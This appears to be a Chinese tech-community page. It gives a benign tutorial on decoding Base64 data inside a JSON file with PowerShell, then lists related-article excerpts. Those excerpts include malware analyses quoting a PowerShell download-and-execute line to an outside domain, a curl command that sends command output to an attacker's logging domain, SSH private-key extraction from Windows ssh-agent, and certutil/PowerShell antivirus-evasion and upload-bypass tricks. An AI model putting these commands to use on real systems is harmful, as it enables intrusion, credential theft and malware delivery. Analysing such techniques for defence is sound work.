首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

用Powershell只在JSON文件的一部分解码Base64

Powershell是一种跨平台的脚本语言,它可以用于自动化任务和系统管理。在处理JSON文件时,可以使用Powershell来解码Base64编码的数据。

首先,我们需要使用Powershell的Get-Content命令来读取JSON文件的内容,并将其存储在一个变量中。假设我们的JSON文件名为data.json,可以使用以下命令来读取文件内容:

代码语言:txt
复制
$jsonContent = Get-Content -Raw -Path "data.json"

接下来,我们可以使用Powershell的ConvertFrom-Json命令将JSON字符串转换为Powershell对象。在这个过程中,如果JSON文件中包含Base64编码的数据,我们可以使用Powershell的[System.Convert]类的FromBase64String方法来解码这部分数据。以下是解码Base64的示例代码:

代码语言:txt
复制
# 读取JSON文件内容
$jsonContent = Get-Content -Raw -Path "data.json"

# 将JSON字符串转换为Powershell对象
$jsonObject = $jsonContent | ConvertFrom-Json

# 解码Base64数据
$base64Data = $jsonObject.Base64Data
$decodedData = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Data))

在上述示例中,我们假设JSON文件中有一个名为Base64Data的属性,它包含了Base64编码的数据。解码后的数据存储在变量$decodedData中。

需要注意的是,以上示例仅展示了如何使用Powershell解码JSON文件中的Base64数据的一部分。实际应用中,可能还需要根据具体需求进行进一步的处理和操作。

关于Powershell的更多信息和用法,您可以参考腾讯云的Powershell开发者指南:Powershell开发者指南

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

从一个恶意活动中学习 PowerShell 解码

检查日志后,可以发现以随机字符命名服务名称出现,如下图中所示,圈起来部分,它属性看起来非常有趣: 提示:Autoruns 保存数据文件为 arn 格式 按照常理来说,Windows Server...以下为一张 base64 代码快速预览表,我把它们都放在了一起: base64 代码 解码 描述 JAB $....现在把 H4sIAAAAA[..]GDQAA 进行 base64 解码,如下图所示: 3 第三层 – The Last Beacon 查看解码内容,并没有什么东西能引起我注意,看不到 URL,...我们遇到过攻击者将 PE 文件代码嵌入脚本文件中,什么是 ShellCode?...操作系统,而无需用户干预; 分析了 ShellCode 之后,我们发现它是 Cobalt Strike 一部分

89740

从Windows 10 SSH-Agent中提取SSH私钥

过去我曾有过劫持ssh-agent.相关经验,并尝试过一些有趣测试,所以我决定开始查看Windows是如何“安全地”这个新服务来存储您私钥。...返回Base64看起来不像是私钥,但我只是为了好玩而解码它,然而对于里面出现“ssh-rsa”字符串我感到非常惊喜。 ? 找出二进制格式 这部分是我花时间最长一部分。...我知道我有某种键二进制表示,但我无法找出格式或如何使用它。 我openssl,puttygen和ssh-keygen来生成各种RSA密钥,但从来没有得到类似于我拥有的二进制文件任何东西。...由于我不知道如何在Powershell中解析二进制数据,所以我把所有的密钥保存到了一个JSON文件中,然后我可以Python中导入。Powershell脚本只有几行: ?...从Powershell脚本生成JSON将输出所有的RSA私钥: ? 这些RSA私钥是未加密。虽然我创建它们时,添加了一个密码,但它们使用ssh-agent未加密存储,所以我不再需要密码。

2.7K30
  • DNS劫持欺骗病毒“自杀”

    系统磁盘下windows目录下发现多个随机命名exe文件,以及mimikatz运行日志文件,包括powershell文件。发现中毒后第一时间使用杀毒软件清理病毒,简单粗暴!...病毒利用powershell远程下载一段新powershell代码执行,这里会定时下载新病毒文件执行挖矿并开始蠕虫式传播。...通过远程下载后拿到病毒代码,发现powershell代码被混淆过,简单解码后主要内容可以看出: ? ?...首先分析powershell代码,base64解码后得到地址: IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'...| Stop-Process -For 将上述代码通过base64加密后放到我们自己搭建web服务上,web服务代码如下,当然也可以直接通过配置nginx返回要替换ps代码,这里我pytohn

    2.5K30

    这款开源神器,堪称程序员界「瑞士军刀」!

    其主要原因,是里面集成了诸多实用开发者工具,比如 JSON 格式化、正则表达式测试、Base64 编码与解码、PNG/JPEG 图片压缩、色盲模拟器等功能。...JSON 转 YAML 文件: 正则表达式测试: Markdown 预览: Hash 生成: 聊完功能,我们再来看下如何安装和使用。...咱们重点来看下它一个比较酷地方:通过 PowerShell 快速启动各类工具。 方法很简单,就是软件安装成功之后,打开 PowerShell,运行类似 start devtoys:?...tool=jsonformat {tool name} 支持多种参数,你可以根据不同参数名称, PowerShell 来快速打开不同工具。...总的来说,这款工具还是比较强大,不过里面的部分功能需要付费才能使用,大家可仔细考量,自行斟酌。 倘若你实在不想付费,也可以直接 Xcode 编译该项目的 GitHub 源码,本机运行。

    1.4K20

    隐藏在注册表恶意软件 – Poweliks

    Poweliks计算机注册表里面存储它组件,所以很难通过普通防病毒软件进行检测。 ?...GData公司发布文章提到,Poweliks所有的活动都存储注册表中,没有任何文件被创建过,所以能够绕过传统恶意软件文件扫描技术,并且能够执行任意操作。...Poweliks行为特征: 1、利用Microsoft Word中漏洞制作Word文件,然后通过电子邮件方式传播 2、创建一个隐藏自启动注册表项 3、解码该启动项之后发现:代码中一部分会判断系统是否安装了...PowerShell,另外一部分是经过Base64编码PowerShell脚本, 该脚本调用并执行攻击者定义shellcode 4、shellcode会执行Windows二进制文件payload...,该payload会查询机器硬编码IP地址,以接受攻击者进一步指令 5、以上所有的执行过程全部存储注册表中,没有任何文件被创建 Poweliks是一个功能非常复杂软件软件,它使用多个代码来隐藏自身

    1.5K100

    针对哈萨克斯坦基于多阶段 PowerShell 攻击

    该 lib7.ps1 下载来自同一个帐户Github上,并将其存储PDF文件目录中(其实可以下载更隐蔽目录中)。...运行 PowerShell 脚本包含一个 Base64 编码,解码后, CBC 模式下由三重 DES (3DES) 算法解密: 脚本一部分定义了一个名为 heller 函数,作用是提升系统权限并允许绕过...解密命令后,我们可以看到UAC绕过过程,包括Task Scheduler中创建一个SilentCleanup任务,调用PowerShell以更高权限执行创建vbs文件。...虽然经过免杀处理,但还是明显看出来是coabltstrikepowershell payload。采用 base64 编码并使用 35 密钥进行 XOR 加密。...解码和解密 ShellCode 后,它使用 VirtualAlloc 将其分配到内存中,最后通过调用 Invoke 函数执行它。

    97020

    干货 | Certutil渗透中利用和详解

    渗透中主要利用其 下载、编码、解码、替代数据流 等功能。 这里我首先在命令行certutil -?...查看一下certutil所有的参数,这里截图了一部分,接下来就总结一下最常用几个关于certutil在内网渗透中应用。 ?...certutil下载文件 一般我最常使用certutil功能就是cmd环境下下载文件,因为certutil是windows自带exe,所以使用时候会比其他exe或者vbs更加方便。...:8000/artifact.exe delete certutil base64加解密 之前实战中就碰到过需要进行内网穿透时候,代理软件上传不到靶机情况 ?...certutil配合powershell内存加载 这里我本地实验因为环境变量原因报错,这里还是粗略写一下大致实现过程 首先修改powershell策略为可执行脚本 ?

    6K61

    干货 | Certutil渗透中利用和详解

    渗透中主要利用其 下载、编码、解码、替代数据流 等功能。 这里我首先在命令行certutil -?...查看一下certutil所有的参数,这里截图了一部分,接下来就总结一下最常用几个关于certutil在内网渗透中应用。...certutil下载文件 一般我最常使用certutil功能就是cmd环境下下载文件,因为certutil是windows自带exe,所以使用时候会比其他exe或者vbs更加方便。...这里我本地搭建一个http服务器,然后配置了360虚拟机cmd下进行下载 这里我为了更好还原环境,先与虚拟机建立ipc连接后用psexec得到了命令行cmd环境 这里我常规命令进行下载exe...值 certutil配合powershell内存加载 这里我本地实验因为环境变量原因报错,这里还是粗略写一下大致实现过程 首先修改powershell策略为可执行脚本 下载powershell

    2.2K20

    记一次 PowerShell 免杀实战

    powershell 具有硬盘中易绕过,内存中难查杀特点。...一般在后渗透中,攻击者可以计算机上执行代码时,会下载 powershell 脚本来执行,ps1 脚本文件无需写入到硬盘中,直接可以在内存中执行 0x02 前戏 常见 powershell 攻击工具有...既然是把字符串进行加载不如整个编一个 base64?然后解码后加载,想着想着就开始尝试了: 首先把字符串全部给 base64,我这里先用 burp base64 ?...然后扔进去加载之前 base64 还原 把编码后代码解码后加载,顺便搞一个 UTF-8 ?...尝试修改变量名称来绕过 发现没什么太大用处,还剩两个 尝试把 base64 编码后字符串拆开看看 ? 把上面的 base64 字符串猜开来 base64 时候组合一下 ?

    2.1K10

    带外攻击OOB(RCE无回显骚思路总结)

    很容易看出来,这种方式数据不容易被阻塞,并且可以通过我们服务器端程序里面捕捉SIGURG信号来及时接受数据。这正是我们所要求效果。...再例如 XXE,引入外部文件时,如果程序也不返回任何信息和引用文件内容,而提示输入是否有误,那么也无法直接判断程序是否存在 XXE 漏洞,我们也可以叫盲 XXE。...powershell搭配,但杀毒软件往往禁用powershell,因此利用条件较苛刻3.在线网站DNS/HTTP管道解析经常在拿下shell时候碰到命令执行无回显情况,因此为了解决命令执行无回显时,...cmd=curl http://XXXXXX.ceye.io/`ls -al | sed -n '2p'`结果:http://XXXXXX.ceye.io/drwxr-xr-x发现空格不能被带出来,base64...temp文件中,再对temp文件进行base64加密变成temp2文件,再对temp2文件多余字符"CERTIFICATE"删掉变成temp3,再对temp3内容删除换行符生成所有数据一行temp4

    5.4K40

    黑客 Log4j 攻击中使用新 PowerShell 后门

    据观察,被认为是伊朗 APT35 国家支持组织(又名“迷人小猫”或“磷”)一部分黑客利用 Log4Shell 攻击来释放新 PowerShell 后门。...然而,作为他们研究一部分,分析师们还发现了一个名为“CharmPower” PowerShell 模块化后门形式新东西。...用于多项任务模块化后门 对 CVE-2021-44228 利用会导致运行带有 base64 编码负载 PowerShell 命令,最终从参与者控制 Amazon S3 存储桶中获取“CharmPower...核心模块不断向 C2 发送 HTTP POST 请求,这些请求要么没有得到答复,要么收到一个 Base64 字符串,该字符串启动下载额外 PowerShell 或 C# 模块。...命令执行- 具有 Invoke-Expression、cmd 和 PowerShell 选项远程命令执行模块。 清理- 删除受感染系统中留下所有痕迹模块,例如注册表和启动文件夹条目、文件和进程。

    7.1K10

    内网渗透之云桌面文件上传限制绕过

    文章前言 有时候我们在对内网环境环境进行渗透时发现了可渗透云桌面并且进入到了云桌面的操作界面时,此时我们想要对该内网进行进一步渗透测试却发现当我们上传一些工具到云桌面时却无法上传exe文件,但是可以上传诸如...txt文本文件,而且云桌面不出网,在这种情况下我们可以考虑通过window系统自带一些工具来实现对文件上传限制绕过 具体实现 CertUtil Windows 7之后windows系统自带CertUtil...命令,它可以用于MD5、SHA1等算法加密和解密操作,我们可以使用CertUtil对我们想要上传exe文件进行base64加密并输出未文本之后通过目标主机上certUtil将其还原从而实现上传文件目的...Powershell亦可以用于加密解密操作,这里思路和上面一致,我们可以使用Powershell对想要上传到目标云桌面的exe程序进行base64加密操作并转为txt格式,之后上传txt到云桌面,最后云桌面调用系统自带...Powershell进行解密还原exe程序即可,下面是具体实现: Step 1:Fscan执行结果如下 Step 2:使用PowerShell进行base64编码,将fscan64.exe编码输出未txt

    13010

    云桌面文件上传限制绕过

    文章前言 有时候我们在对内网环境环境进行渗透时发现了可渗透云桌面并且进入到了云桌面的操作界面时,此时我们想要对该内网进行进一步渗透测试却发现当我们上传一些工具到云桌面时却无法上传exe文件,但是可以上传诸如...txt文本文件,而且云桌面不出网,在这种情况下我们可以考虑通过window系统自带一些工具来实现对文件上传限制绕过 具体实现 CertUtil Windows 7之后windows系统自带CertUtil...命令,它可以用于MD5、SHA1等算法加密和解密操作,我们可以使用CertUtil对我们想要上传exe文件进行base64加密并输出未文本之后通过目标主机上certUtil将其还原从而实现上传文件目的...Powershell亦可以用于加密解密操作,这里思路和上面一致,我们可以使用Powershell对想要上传到目标云桌面的exe程序进行base64加密操作并转为txt格式,之后上传txt到云桌面,...最后云桌面调用系统自带Powershell进行解密还原exe程序即可,下面是具体实现: Step 1:Fscan执行结果如下 Step 2:使用PowerShell进行base64编码,将fscan64

    3.9K10

    隐藏在证书文件PowerShell(一)

    自从Casey SmithTwitter上发推演示了Certutil base64解码编码之后,一些红队人员和网络犯罪份子就开始利用这种编码技术来生成各种可绕过入侵检测和杀毒软件恶意文件。...而base64编码是以6个比特块来编码,所以 010011 就是第一个被编码块,010011 十进制表示就是19,而在base64编码中,0编码成A,1编码成B,以此类推…,19则被编码成T,如下所示...如我们前述PE文件编码说明,可以确定其ASCII字节环境下,它是以0x30开头,而在base64编码过程中,它首先则是以大写字母M开头。...它被检测率为0,也就是全部通过,但当我们base64dump.py对它进行base64解码之后,看到了一些有意思发现: 这个证书文件竟然包含了经过编码PowerShell脚本程序,吓得我们….。...这个脚本检测需要几个步骤,《隐藏在证书文件PowerShell》系列第2部份,我们会继续讨论。

    1.5K30

    “污水”(MuddyWater)APT组织C2工具MuddyC3浅析

    该APT组织显著攻击行为特点为善于利用powershell等脚本后门,通过Powershell在内存中执行,减少新PE文件受害者机器落地,这种方式使该组织样本有着较低检测率,另一方面也加大了安全机构取证难度...具有代理、文件传输、屏幕截图等功能 整体结构清晰、工程化 其通信过程与一般C2并无太多不同,都是通过C2生成载荷,然后目标上执行载荷,然后通过下发命令利用powershell接口来达到自己想要结果...其核心还是去请求 http://192.168.2.114:4444/hjf 其内容又是一串base64字符串 ? 解码: ?...中间base64解码得到: ? 而 ---+Powershell JOB + File +SCT Payload+--- 该payload则是去请求了sct这个路径: ? 其余并无太大变化。...并将内容进行base64编码,然后上传至服务端。无命令则sleep 2 ? 服务端进行解码,输出。 ? 而模块加载功能是注册re下面的 ? 用来读取Modules/下面的文件客户端代码如下: ?

    1.1K20

    供应链投毒预警 | 开源供应链投毒202401最新月报来啦!

    目前主流投毒攻击方式包括:恶意文件执行代码混淆执行恶意文件下载shell 命令执行恶意文件释放恶意代码内存执行其中,恶意文件执行是最常见投毒攻击方式,占比高达 77%,其攻击流程主要利用开源组件管理器安装组件包过程中通过投毒者自定义恶意指令来自动加载执行内置组件包中恶意代码文件...base64、ascii 等编码) 转换为可显字符串后内嵌到投毒包代码文件中。...Run 函数先将 base64 编码 url 进行解码后通过 urllib 远程下载 base64 编码恶意代码,最后会对恶意代码进行 base64 解码后调用 subprocess.Popen 启动新进程执行第二阶段.../macd.b64解码第二阶段python攻击代码如下所示:第二阶段python攻击代码调用send函数先将base64编码update_information_url进行解码后通过urllib远程下载第三阶段加密恶意代码...)进行投毒攻击,主要通过 package.json 中定义 postinstall 指令,postinstall 指令安装投毒包时将自动触发执行包含混淆代码 postinstall.js 恶意文件

    32610

    利用USB橡皮鸭目标机器上启动Empire或Meterpreter会话

    大多数机器之前从未运行或加载过Ducky(或者特定VID/PID),所以你必须假设加载驱动程序,将是我们物理攻击中相对耗时和必不可少一部分。...声东击西:3秒内执行Pastebin 步骤1:BASE64解码STAGER ?...步骤2:将stager上传至Pastebin 将Base64解码PowerShell复制粘贴至Pastebin并且保存原始路径。确保使用安全https链接以避免检测。...步骤1:将RUBBER DUCKY固件更新到Twin Duck 步骤2:添加驱动标签 步骤3:BASE64解码EMPIRE STAGER并将其上传到PASTEBIN 步骤4:POWERSHELL中创建调度任务...“DUCKY”驱动器,然后提取该驱动器字母,并将PowerShell文件追加到字符串并执行该脚本。

    1.7K70
    领券